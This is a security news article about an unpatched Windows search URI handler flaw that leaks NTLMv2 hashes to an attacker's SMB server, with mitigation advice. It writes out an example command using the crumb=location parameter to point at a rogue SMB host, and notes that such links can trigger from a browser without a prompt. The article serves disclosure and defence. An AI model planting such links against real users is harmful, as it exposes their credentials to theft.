A recent discovery has revealed a significant vulnerability in the Windows search URI handler, facilitating the leakage of NTLMv2 hashes to servers controlled by attackers through a simple link interaction. This newly identified issue mirrors a previous bug found in the Snipping Tool, known as CVE-2026-33829, although this variant has not been assigned a CVE or patched by Microsoft.
Understanding the Windows URI Vulnerability
On April 14, 2026, Microsoft addressed CVE-2026-33829, a flaw in the Snipping Tool’s URI handler that led to NTLM credential exposure. This vulnerability allowed attackers to exploit the ms-screensketch: URI handler by directing a filePath parameter to a remote UNC path, resulting in an automatic SMB authentication attempt and the unintentional transmission of a user’s Net-NTLMv2 hash.
Huntress, a cybersecurity firm, discovered that a similar mechanism exists within the Windows search URI handler. By employing crumb=location instead of filePath, attackers can achieve the same NTLMv2 hash leakage to a rogue SMB endpoint. This vulnerability was successfully replicated on Windows 11 25H2 Pro with default settings, underscoring the potential risk to users.
How the Flaw is Exploited
Exploiting this flaw involves tricking a user into clicking a seemingly harmless link, prompting their machine to automatically attempt authentication with an attacker’s SMB server. This process can be initiated from a command prompt using a specific command structure that includes start “” “search:query=test&crumb=location:10.0.1.100share”. The initial click is crucial, as it is the only instance where the NTLMv2 hash is leaked during a single login session.
Moreover, attackers can embed these links in web browsers, such as Microsoft Edge, where loading the URI triggers an SMB authentication attempt without any user prompts. The inherent design of the search and search-ms URI schemes, which share a command line and CLSID mapping, facilitates this vulnerability, necessitating fixes within the SearchExecute or ExplorerFrame.dll components.
Mitigation and Security Recommendations
Despite similarities to the patched Snipping Tool flaw, Microsoft has not yet resolved the search URI vulnerability, citing it as below the servicing threshold. Huntress advises organizations to block outbound SMB (ports TCP 445 and 139) from non-essential hosts as a primary countermeasure. Additional strategies include enforcing SMB signing, limiting or disabling NTLM traffic, and monitoring URI activity in system logs.
These preventive measures can substantially mitigate exposure to this class of NTLM leakage vulnerabilities. As always, staying informed and proactive in applying security best practices is essential in protecting organizational and personal data.
For those interested in further enhancing their cybersecurity knowledge, a free webinar on OWASP API Top 10 and visibility gap solutions with WAAP is available.
